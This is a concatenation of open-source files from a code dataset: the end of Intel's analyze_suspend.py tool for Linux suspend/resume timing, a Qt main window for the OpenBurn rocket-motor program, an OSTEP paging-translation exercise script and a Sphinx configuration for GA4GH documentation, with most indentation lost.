print('%s (%s)' % (rectype[header[0]], rechead[0]))
print(' Reset END : %u ns' % record[4])
print(' OS Loader LoadImage Start : %u ns' % record[5])
print(' OS Loader StartImage Start : %u ns' % record[6])
print(' ExitBootServices Entry : %u ns' % record[7])
print(' ExitBootServices Exit : %u ns' % record[8])
elif(rechead[0] == 'S3PT'):
if(output):
print('%s (%s)' % (rectype[header[0]], rechead[0]))
j = 0
while(j < len(recdata)):
prechead = struct.unpack('HBB', recdata[j:j+4])
				if(prechead[1] == 0):
					break
				if(prechead[0] not in prectype):
					# unknown sub-record: advance past it so this loop terminates
					j += prechead[1]
					continue
if(prechead[0] == 0):
record = struct.unpack('IIQQ', recdata[j:j+prechead[1]])
fwData[1] = record[2]
if(output):
print(' %s' % prectype[prechead[0]])
print(' Resume Count : %u' % \
record[1])
print(' FullResume : %u ns' % \
record[2])
print(' AverageResume : %u ns' % \
record[3])
elif(prechead[0] == 1):
record = struct.unpack('QQ', recdata[j+4:j+prechead[1]])
fwData[0] = record[1] - record[0]
if(output):
print(' %s' % prectype[prechead[0]])
print(' SuspendStart : %u ns' % \
record[0])
print(' SuspendEnd : %u ns' % \
record[1])
print(' SuspendTime : %u ns' % \
fwData[0])
j += prechead[1]
if(output):
print('')
i += header[1]
fp.close()
return fwData
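# Note (added): on success getFPDT() returns [fw_suspend_ns, fw_resume_ns],
# where index 0 is SuspendEnd - SuspendStart from the Basic S3 Suspend record
# and index 1 is the FullResume value from the Basic S3 Resume record; it
# returns False when the FPDT table or sysvals.mempath cannot be read.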
# Function: statusCheck
# Description:
# Verify that the requested command and options will work, and
# print the results to the terminal
# Output:
# True if the test will work, False if not
def statusCheck():
global sysvals
status = True
if(sysvals.android):
print('Checking the android system ...')
else:
print('Checking this system (%s)...' % platform.node())
# check if adb is connected to a device
if(sysvals.android):
res = 'NO'
out = os.popen(sysvals.adb+' get-state').read().strip()
if(out == 'device'):
res = 'YES'
print(' is android device connected: %s' % res)
if(res != 'YES'):
print(' Please connect the device before using this tool')
return False
# check we have root access
res = 'NO (No features of this tool will work!)'
if(sysvals.android):
out = os.popen(sysvals.adb+' shell id').read().strip()
if('root' in out):
res = 'YES'
else:
if(os.environ['USER'] == 'root'):
res = 'YES'
print(' have root access: %s' % res)
if(res != 'YES'):
if(sysvals.android):
print(' Try running "adb root" to restart the daemon as root')
else:
print(' Try running this script with sudo')
return False
# check sysfs is mounted
res = 'NO (No features of this tool will work!)'
if(sysvals.android):
out = os.popen(sysvals.adb+' shell ls '+\
sysvals.powerfile).read().strip()
if(out == sysvals.powerfile):
res = 'YES'
else:
if(os.path.exists(sysvals.powerfile)):
res = 'YES'
print(' is sysfs mounted: %s' % res)
if(res != 'YES'):
return False
# check target mode is a valid mode
res = 'NO'
modes = getModes()
if(sysvals.suspendmode in modes):
res = 'YES'
else:
status = False
print(' is "%s" a valid power mode: %s' % (sysvals.suspendmode, res))
if(res == 'NO'):
print(' valid power modes are: %s' % modes)
print(' please choose one with -m')
# check if the tool can unlock the device
if(sysvals.android):
res = 'YES'
out1 = os.popen(sysvals.adb+\
' shell dumpsys power | grep mScreenOn').read().strip()
out2 = os.popen(sysvals.adb+\
' shell input').read().strip()
if(not out1.startswith('mScreenOn') or not out2.startswith('usage')):
res = 'NO (wake the android device up before running the test)'
print(' can I unlock the screen: %s' % res)
# check if ftrace is available
res = 'NO'
ftgood = verifyFtrace()
if(ftgood):
res = 'YES'
elif(sysvals.usecallgraph):
status = False
print(' is ftrace supported: %s' % res)
# what data source are we using
res = 'DMESG'
if(ftgood):
sysvals.usetraceeventsonly = True
sysvals.usetraceevents = False
for e in sysvals.traceevents:
check = False
if(sysvals.android):
out = os.popen(sysvals.adb+' shell ls -d '+\
sysvals.epath+e).read().strip()
if(out == sysvals.epath+e):
check = True
else:
if(os.path.exists(sysvals.epath+e)):
check = True
if(not check):
sysvals.usetraceeventsonly = False
if(e == 'suspend_resume' and check):
sysvals.usetraceevents = True
if(sysvals.usetraceevents and sysvals.usetraceeventsonly):
res = 'FTRACE (all trace events found)'
elif(sysvals.usetraceevents):
res = 'DMESG and FTRACE (suspend_resume trace event found)'
print(' timeline data source: %s' % res)
# check if rtcwake
res = 'NO'
if(sysvals.rtcpath != ''):
res = 'YES'
elif(sysvals.rtcwake):
status = False
print(' is rtcwake supported: %s' % res)
return status
# Function: doError
# Description:
# generic error function for catastrophic failures
# Arguments:
# msg: the error message to print
# help: True if printHelp should be called after, False otherwise
def doError(msg, help):
if(help == True):
printHelp()
print('ERROR: %s\n') % msg
sys.exit()
# Function: doWarning
# Description:
# generic warning function for non-catastrophic anomalies
# Arguments:
# msg: the warning message to print
# file: If not empty, a filename to request be sent to the owner for debug
def doWarning(msg, file):
print('/* %s */') % msg
if(file):
print('/* For a fix, please send this'+\
' %s file to <todd.e.brandt@intel.com> */' % file)
# Function: rootCheck
# Description:
# quick check to see if we have root access
def rootCheck():
if(os.environ['USER'] != 'root'):
doError('This script must be run as root', False)
# Function: getArgInt
# Description:
# pull out an integer argument from the command line with checks
def getArgInt(name, args, min, max):
try:
arg = args.next()
except:
doError(name+': no argument supplied', True)
try:
val = int(arg)
except:
doError(name+': non-integer value given', True)
if(val < min or val > max):
doError(name+': value should be between %d and %d' % (min, max), True)
return val
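# Illustrative example (added): with "-rtcwake 15" on the command line,
# getArgInt('-rtcwake', args, 0, 3600) returns 15; a value such as 7200
# would instead trigger doError() because it falls outside 0..3600.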
# Function: rerunTest
# Description:
# generate an output from an existing set of ftrace/dmesg logs
def rerunTest():
global sysvals
if(sysvals.ftracefile != ''):
doesTraceLogHaveTraceEvents()
if(sysvals.dmesgfile == '' and not sysvals.usetraceeventsonly):
doError('recreating this html output '+\
'requires a dmesg file', False)
sysvals.setOutputFile()
vprint('Output file: %s' % sysvals.htmlfile)
print('PROCESSING DATA')
if(sysvals.usetraceeventsonly):
testruns = parseTraceLog()
else:
testruns = loadKernelLog()
for data in testruns:
parseKernelLog(data)
if(sysvals.ftracefile != ''):
appendIncompleteTraceLog(testruns)
createHTML(testruns)
# Function: runTest
# Description:
# execute a suspend/resume, gather the logs, and generate the output
def runTest(subdir):
global sysvals
# prepare for the test
if(not sysvals.android):
initFtrace()
else:
initFtraceAndroid()
sysvals.initTestOutput(subdir)
vprint('Output files:\n %s' % sysvals.dmesgfile)
if(sysvals.usecallgraph or
sysvals.usetraceevents or
sysvals.usetraceeventsonly):
vprint(' %s' % sysvals.ftracefile)
vprint(' %s' % sysvals.htmlfile)
# execute the test
if(not sysvals.android):
executeSuspend()
else:
executeAndroidSuspend()
# analyze the data and create the html output
print('PROCESSING DATA')
if(sysvals.usetraceeventsonly):
# data for kernels 3.15 or newer is entirely in ftrace
testruns = parseTraceLog()
else:
# data for kernels older than 3.15 is primarily in dmesg
testruns = loadKernelLog()
for data in testruns:
parseKernelLog(data)
if(sysvals.usecallgraph or sysvals.usetraceevents):
appendIncompleteTraceLog(testruns)
createHTML(testruns)
# Function: runSummary
# Description:
# create a summary of tests in a sub-directory
def runSummary(subdir, output):
global sysvals
# get a list of ftrace output files
files = []
for dirname, dirnames, filenames in os.walk(subdir):
for filename in filenames:
if(re.match('.*_ftrace.txt', filename)):
files.append("%s/%s" % (dirname, filename))
# process the files in order and get an array of data objects
testruns = []
for file in sorted(files):
if output:
print("Test found in %s" % os.path.dirname(file))
sysvals.ftracefile = file
sysvals.dmesgfile = file.replace('_ftrace.txt', '_dmesg.txt')
doesTraceLogHaveTraceEvents()
sysvals.usecallgraph = False
if not sysvals.usetraceeventsonly:
if(not os.path.exists(sysvals.dmesgfile)):
print("Skipping %s: not a valid test input" % file)
continue
else:
if output:
f = os.path.basename(sysvals.ftracefile)
d = os.path.basename(sysvals.dmesgfile)
print("\tInput files: %s and %s" % (f, d))
testdata = loadKernelLog()
data = testdata[0]
parseKernelLog(data)
testdata = [data]
appendIncompleteTraceLog(testdata)
else:
if output:
print("\tInput file: %s" % os.path.basename(sysvals.ftracefile))
testdata = parseTraceLog()
data = testdata[0]
data.normalizeTime(data.tSuspended)
link = file.replace(subdir+'/', '').replace('_ftrace.txt', '.html')
data.outfile = link
testruns.append(data)
createHTMLSummarySimple(testruns, subdir+'/summary.html')
# Function: printHelp
# Description:
# print out the help text
def printHelp():
global sysvals
modes = getModes()
print('')
print('AnalyzeSuspend v%.1f' % sysvals.version)
print('Usage: sudo analyze_suspend.py <options>')
print('')
print('Description:')
print(' This tool is designed to assist kernel and OS developers in optimizing')
print(' their linux stack\'s suspend/resume time. Using a kernel image built')
print(' with a few extra options enabled, the tool will execute a suspend and')
print(' capture dmesg and ftrace data until resume is complete. This data is')
print(' transformed into a device timeline and an optional callgraph to give')
print(' a detailed view of which devices/subsystems are taking the most')
print(' time in suspend/resume.')
print('')
print(' Generates output files in subdirectory: suspend-mmddyy-HHMMSS')
print(' HTML output: <hostname>_<mode>.html')
print(' raw dmesg output: <hostname>_<mode>_dmesg.txt')
print(' raw ftrace output: <hostname>_<mode>_ftrace.txt')
print('')
print('Options:')
print(' [general]')
print(' -h Print this help text')
print(' -v Print the current tool version')
print(' -verbose Print extra information during execution and analysis')
print(' -status Test to see if the system is enabled to run this tool')
print(' -modes List available suspend modes')
print(' -m mode Mode to initiate for suspend %s (default: %s)') % (modes, sysvals.suspendmode)
print(' -rtcwake t Use rtcwake to autoresume after <t> seconds (default: disabled)')
print(' [advanced]')
print(' -f Use ftrace to create device callgraphs (default: disabled)')
print(' -filter "d1 d2 ..." Filter out all but this list of dev names')
print(' -x2 Run two suspend/resumes back to back (default: disabled)')
print(' -x2delay t Minimum millisecond delay <t> between the two test runs (default: 0 ms)')
print(' -postres t Time after resume completion to wait for post-resume events (default: 0 S)')
print(' -multi n d Execute <n> consecutive tests at <d> seconds intervals. The outputs will')
print(' be created in a new subdirectory with a summary page.')
print(' [utilities]')
print(' -fpdt Print out the contents of the ACPI Firmware Performance Data Table')
print(' -usbtopo Print out the current USB topology with power info')
print(' -usbauto Enable autosuspend for all connected USB devices')
print(' [android testing]')
print(' -adb binary Use the given adb binary to run the test on an android device.')
print(' The device should already be connected and with root access.')
print(' Commands will be executed on the device using "adb shell"')
print(' [re-analyze data from previous runs]')
print(' -ftrace ftracefile Create HTML output using ftrace input')
print(' -dmesg dmesgfile Create HTML output using dmesg (not needed for kernel >= 3.15)')
	print('    -summary directory  Create a summary of all tests in this dir')
print('')
return True
# ----------------- MAIN --------------------
# exec start (skipped if script is loaded as library)
if __name__ == '__main__':
cmd = ''
cmdarg = ''
multitest = {'run': False, 'count': 0, 'delay': 0}
# loop through the command line arguments
args = iter(sys.argv[1:])
for arg in args:
if(arg == '-m'):
try:
val = args.next()
except:
doError('No mode supplied', True)
sysvals.suspendmode = val
elif(arg == '-adb'):
try:
val = args.next()
except:
doError('No adb binary supplied', True)
if(not os.path.exists(val)):
doError('file doesnt exist: %s' % val, False)
if(not os.access(val, os.X_OK)):
doError('file isnt executable: %s' % val, False)
try:
check = os.popen(val+' version').read().strip()
except:
doError('adb version failed to execute', False)
if(not re.match('Android Debug Bridge .*', check)):
doError('adb version failed to execute', False)
sysvals.adb = val
sysvals.android = True
elif(arg == '-x2'):
if(sysvals.postresumetime > 0):
doError('-x2 is not compatible with -postres', False)
sysvals.execcount = 2
elif(arg == '-x2delay'):
sysvals.x2delay = getArgInt('-x2delay', args, 0, 60000)
elif(arg == '-postres'):
if(sysvals.execcount != 1):
doError('-x2 is not compatible with -postres', False)
sysvals.postresumetime = getArgInt('-postres', args, 0, 3600)
elif(arg == '-f'):
sysvals.usecallgraph = True
elif(arg == '-modes'):
cmd = 'modes'
elif(arg == '-fpdt'):
cmd = 'fpdt'
elif(arg == '-usbtopo'):
cmd = 'usbtopo'
elif(arg == '-usbauto'):
cmd = 'usbauto'
elif(arg == '-status'):
cmd = 'status'
elif(arg == '-verbose'):
sysvals.verbose = True
elif(arg == '-v'):
print("Version %.1f" % sysvals.version)
sys.exit()
elif(arg == '-rtcwake'):
sysvals.rtcwake = True
sysvals.rtcwaketime = getArgInt('-rtcwake', args, 0, 3600)
elif(arg == '-multi'):
multitest['run'] = True
multitest['count'] = getArgInt('-multi n (exec count)', args, 2, 1000000)
multitest['delay'] = getArgInt('-multi d (delay between tests)', args, 0, 3600)
elif(arg == '-dmesg'):
try:
val = args.next()
except:
doError('No dmesg file supplied', True)
sysvals.notestrun = True
sysvals.dmesgfile = val
if(os.path.exists(sysvals.dmesgfile) == False):
doError('%s doesnt exist' % sysvals.dmesgfile, False)
elif(arg == '-ftrace'):
try:
val = args.next()
except:
doError('No ftrace file supplied', True)
sysvals.notestrun = True
sysvals.usecallgraph = True
sysvals.ftracefile = val
if(os.path.exists(sysvals.ftracefile) == False):
doError('%s doesnt exist' % sysvals.ftracefile, False)
elif(arg == '-summary'):
try:
val = args.next()
except:
doError('No directory supplied', True)
cmd = 'summary'
cmdarg = val
sysvals.notestrun = True
if(os.path.isdir(val) == False):
				doError('%s isnt accessible' % val, False)
elif(arg == '-filter'):
try:
val = args.next()
except:
doError('No devnames supplied', True)
sysvals.setDeviceFilter(val)
elif(arg == '-h'):
printHelp()
sys.exit()
else:
doError('Invalid argument: '+arg, True)
# just run a utility command and exit
if(cmd != ''):
if(cmd == 'status'):
statusCheck()
elif(cmd == 'fpdt'):
if(sysvals.android):
doError('cannot read FPDT on android device', False)
getFPDT(True)
elif(cmd == 'usbtopo'):
if(sysvals.android):
doError('cannot read USB topology '+\
'on an android device', False)
detectUSB(True)
elif(cmd == 'modes'):
modes = getModes()
print modes
elif(cmd == 'usbauto'):
setUSBDevicesAuto()
elif(cmd == 'summary'):
print("Generating a summary of folder \"%s\"" % cmdarg)
runSummary(cmdarg, True)
sys.exit()
# run test on android device
if(sysvals.android):
if(sysvals.usecallgraph):
doError('ftrace (-f) is not yet supported '+\
'in the android kernel', False)
if(sysvals.notestrun):
doError('cannot analyze test files on the '+\
'android device', False)
# if instructed, re-analyze existing data files
if(sysvals.notestrun):
rerunTest()
sys.exit()
# verify that we can run a test
if(not statusCheck()):
print('Check FAILED, aborting the test run!')
sys.exit()
if multitest['run']:
		# run multiple tests in a separate subdirectory
s = 'x%d' % multitest['count']
subdir = datetime.now().strftime('suspend-'+s+'-%m%d%y-%H%M%S')
os.mkdir(subdir)
for i in range(multitest['count']):
if(i != 0):
print('Waiting %d seconds...' % (multitest['delay']))
time.sleep(multitest['delay'])
print('TEST (%d/%d) START' % (i+1, multitest['count']))
runTest(subdir)
print('TEST (%d/%d) COMPLETE' % (i+1, multitest['count']))
runSummary(subdir, False)
else:
# run the test in the current directory
runTest(".")
|
gpl-2.0
|
tuxxi/OpenBurn
|
openburn/ui/mainwindow.py
|
1
|
3263
|
from qtpy.QtWidgets import (QWidget, QFrame, QMainWindow, QMenuBar, QStatusBar, QAction, QApplication,
QTabWidget, QVBoxLayout)
from qtpy.QtGui import QIcon
from openburn import RESOURCE_PATH
from openburn.ui.dialogs.about import AboutDialog
from openburn.ui.designtab import DesignTab
class MainWindow(QMainWindow):
"""OpenBurn's main window"""
title = "OpenBurn"
def __init__(self):
super(MainWindow, self).__init__()
self.setWindowTitle(self.title)
self.setGeometry(100, 100, 800, 600)
self.setWindowIcon(QIcon(RESOURCE_PATH + "icons/nakka-finocyl.gif"))
self.create_default_widgets()
self.setup_ui()
def create_default_widgets(self):
"""Creates static widgets such as menubar and statusbar"""
def create_menubar():
"""Create menu bar and populate it with sub menu actions"""
def file_menu():
"""Create a file submenu"""
self.file_sub_menu = self.menubar.addMenu('File')
self.open_action = QAction('Open File', self)
self.open_action.setStatusTip('Open a new design')
self.open_action.setShortcut('CTRL+O')
# self.open_action.triggered.connect(self.open_file)
self.exit_action = QAction('Exit', self)
self.exit_action.setStatusTip('Exit the application.')
self.exit_action.setShortcut('CTRL+Q')
self.exit_action.triggered.connect(QApplication.quit)
self.file_sub_menu.addAction(self.open_action)
self.file_sub_menu.addAction(self.exit_action)
def edit_menu():
self.edit_dub_menu = self.menubar.addMenu('Edit')
def tools_menu():
self.edit_dub_menu = self.menubar.addMenu('Tools')
def help_menu():
"""Create help submenu"""
self.help_sub_menu = self.menubar.addMenu('Help')
self.about_action = QAction('About', self)
self.about_action.setStatusTip('About the application.')
self.about_action.setShortcut('CTRL+H')
self.about_action.triggered.connect(self.about_dialog.exec_)
self.help_sub_menu.addAction(self.about_action)
self.menubar = QMenuBar(self)
file_menu()
edit_menu()
tools_menu()
help_menu()
def create_statusbar():
self.statusbar = QStatusBar(self)
self.statusbar.showMessage("Ready", 0)
self.about_dialog = AboutDialog(self)
create_menubar()
self.setMenuBar(self.menubar)
create_statusbar()
self.setStatusBar(self.statusbar)
def setup_ui(self):
"""setup the tab widget UI"""
self.tab_widget = QTabWidget()
self.tab_widget.addTab(DesignTab(), "Design")
self.tab_widget.addTab(QWidget(), "Simulation")
self.tab_widget.addTab(QWidget(), "Propellants")
self.layout = QVBoxLayout()
self.layout.addWidget(self.tab_widget)
self.frame = QFrame()
self.frame.setLayout(self.layout)
self.setCentralWidget(self.frame)
|
gpl-3.0
|
dpatrickx/course-ucore-lab
|
related_info/ostep/ostep4-paging-linear-translate.py
|
54
|
6658
|
#! /usr/bin/env python
import sys
from optparse import OptionParser
import random
import math
def mustbepowerof2(bits, size, msg):
if math.pow(2,bits) != size:
print 'Error in argument: %s' % msg
sys.exit(1)
def mustbemultipleof(bignum, num, msg):
if (int(float(bignum)/float(num)) != (int(bignum) / int(num))):
print 'Error in argument: %s' % msg
sys.exit(1)
def convert(size):
length = len(size)
lastchar = size[length-1]
if (lastchar == 'k') or (lastchar == 'K'):
m = 1024
nsize = int(size[0:length-1]) * m
elif (lastchar == 'm') or (lastchar == 'M'):
m = 1024*1024
nsize = int(size[0:length-1]) * m
elif (lastchar == 'g') or (lastchar == 'G'):
m = 1024*1024*1024
nsize = int(size[0:length-1]) * m
else:
nsize = int(size)
return nsize
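# Illustrative examples (added): convert('16k') -> 16384,
# convert('32m') -> 33554432, convert('1g') -> 1073741824, convert('512') -> 512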
#
# main program
#
parser = OptionParser()
parser.add_option('-A', '--addresses', default='-1',
help='a set of comma-separated pages to access; -1 means randomly generate',
action='store', type='string', dest='addresses')
parser.add_option('-s', '--seed', default=0, help='the random seed', action='store', type='int', dest='seed')
parser.add_option('-a', '--asize', default='16k', help='address space size (e.g., 16, 64k, 32m, 1g)', action='store', type='string', dest='asize')
parser.add_option('-p', '--physmem', default='64k', help='physical memory size (e.g., 16, 64k, 32m, 1g)', action='store', type='string', dest='psize')
parser.add_option('-P', '--pagesize', default='4k', help='page size (e.g., 4k, 8k, whatever)', action='store', type='string', dest='pagesize')
parser.add_option('-n', '--numaddrs', default=5, help='number of virtual addresses to generate', action='store', type='int', dest='num')
parser.add_option('-u', '--used', default=50, help='percent of virtual address space that is used', action='store', type='int', dest='used')
parser.add_option('-v', help='verbose mode', action='store_true', default=False, dest='verbose')
parser.add_option('-c', help='compute answers for me', action='store_true', default=False, dest='solve')
(options, args) = parser.parse_args()
print 'ARG seed', options.seed
print 'ARG address space size', options.asize
print 'ARG phys mem size', options.psize
print 'ARG page size', options.pagesize
print 'ARG verbose', options.verbose
print 'ARG addresses', options.addresses
print ''
random.seed(options.seed)
asize = convert(options.asize)
psize = convert(options.psize)
pagesize = convert(options.pagesize)
addresses = str(options.addresses)
if psize <= 1:
print 'Error: must specify a non-zero physical memory size.'
exit(1)
if asize < 1:
print 'Error: must specify a non-zero address-space size.'
exit(1)
if psize <= asize:
print 'Error: physical memory size must be GREATER than address space size (for this simulation)'
exit(1)
if psize >= convert('1g') or asize >= convert('1g'):
print 'Error: must use smaller sizes (less than 1 GB) for this simulation.'
exit(1)
mustbemultipleof(asize, pagesize, 'address space must be a multiple of the pagesize')
mustbemultipleof(psize, pagesize, 'physical memory must be a multiple of the pagesize')
# print some useful info, like the darn page table
pages = psize / pagesize
import array
used = array.array('i')
pt = array.array('i')
for i in range(0,pages):
used.insert(i,0)
vpages = asize / pagesize
# now, assign some pages of the VA
vabits = int(math.log(float(asize))/math.log(2.0))
mustbepowerof2(vabits, asize, 'address space must be a power of 2')
pagebits = int(math.log(float(pagesize))/math.log(2.0))
mustbepowerof2(pagebits, pagesize, 'page size must be a power of 2')
vpnbits = vabits - pagebits
pagemask = (1 << pagebits) - 1
# import ctypes
# vpnmask = ctypes.c_uint32(~pagemask).value
vpnmask = 0xFFFFFFFF & ~pagemask
#if vpnmask2 != vpnmask:
# print 'ERROR'
# exit(1)
# print 'va:%d page:%d vpn:%d -- %08x %08x' % (vabits, pagebits, vpnbits, vpnmask, pagemask)
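# Worked example (added for illustration): with the default 16k address space
# and 4k pages, vabits = 14, pagebits = 12, vpnbits = 2, pagemask = 0xfff
# and vpnmask = 0xfffff000.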
print ''
print 'The format of the page table is simple:'
print 'The high-order (left-most) bit is the VALID bit.'
print ' If the bit is 1, the rest of the entry is the PFN.'
print ' If the bit is 0, the page is not valid.'
print 'Use verbose mode (-v) if you want to print the VPN # by'
print 'each entry of the page table.'
print ''
print 'Page Table (from entry 0 down to the max size)'
for v in range(0,vpages):
done = 0
while done == 0:
if ((random.random() * 100.0) > (100.0 - float(options.used))):
u = int(pages * random.random())
if used[u] == 0:
done = 1
# print '%8d - %d' % (v, u)
if options.verbose == True:
print ' [%8d] ' % v,
else:
print ' ',
print '0x%08x' % (0x80000000 | u)
pt.insert(v,u)
else:
# print '%8d - not valid' % v
if options.verbose == True:
print ' [%8d] ' % v,
else:
print ' ',
print '0x%08x' % 0
pt.insert(v,-1)
done = 1
print ''
#
# now, need to generate virtual address trace
#
addrList = []
if addresses == '-1':
# need to generate addresses
for i in range(0, options.num):
n = int(asize * random.random())
addrList.append(n)
else:
addrList = addresses.split(',')
print 'Virtual Address Trace'
for vStr in addrList:
# vaddr = int(asize * random.random())
vaddr = int(vStr)
if options.solve == False:
print ' VA 0x%08x (decimal: %8d) --> PA or invalid address?' % (vaddr, vaddr)
else:
paddr = 0
# split vaddr into VPN | offset
vpn = (vaddr & vpnmask) >> pagebits
if pt[vpn] < 0:
print ' VA 0x%08x (decimal: %8d) --> Invalid (VPN %d not valid)' % (vaddr, vaddr, vpn)
else:
pfn = pt[vpn]
offset = vaddr & pagemask
paddr = (pfn << pagebits) | offset
print ' VA 0x%08x (decimal: %8d) --> %08x (decimal %8d) [VPN %d]' % (vaddr, vaddr, paddr, paddr, vpn)
print ''
if options.solve == False:
print 'For each virtual address, write down the physical address it translates to'
print 'OR write down that it is an out-of-bounds address (e.g., segfault).'
print ''
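# Worked example (added for illustration): with pagebits = 12, if VPN 3 is
# mapped to PFN 5 then virtual address 0x3204 splits into VPN 3 / offset 0x204
# and translates to physical address (5 << 12) | 0x204 = 0x5204.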
|
gpl-2.0
|
ekalosak/server
|
docs/source/conf.py
|
5
|
9261
|
# -*- coding: utf-8 -*-
#
# GA4GH documentation build configuration file, created by
# sphinx-quickstart on Wed Apr 1 14:35:20 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'GA4GH'
copyright = u'2015, Global Alliance for Genomics and Health'
author = u'Global Alliance for Genomics and Health'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.0a2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
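# An illustrative example for the sphinx_rtd_theme selected above (these keys
# are options that theme accepts; uncomment and adjust as needed):
#html_theme_options = {
#    'collapse_navigation': False,
#    'navigation_depth': 3,
#}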
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'GA4GHdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'GA4GH.tex', u'GA4GH Documentation',
u'Global Alliance for Genomics and Health', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = "_static/logo_ga.png"
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'ga4gh', u'GA4GH Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'GA4GH', u'GA4GH Documentation',
author, 'GA4GH', 'A reference implementation of the ga4gh API.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
apache-2.0
|
rbrito/pkg-youtube-dl
|
youtube_dl/extractor/bet.py
|
64
|
2783
|
from __future__ import unicode_literals
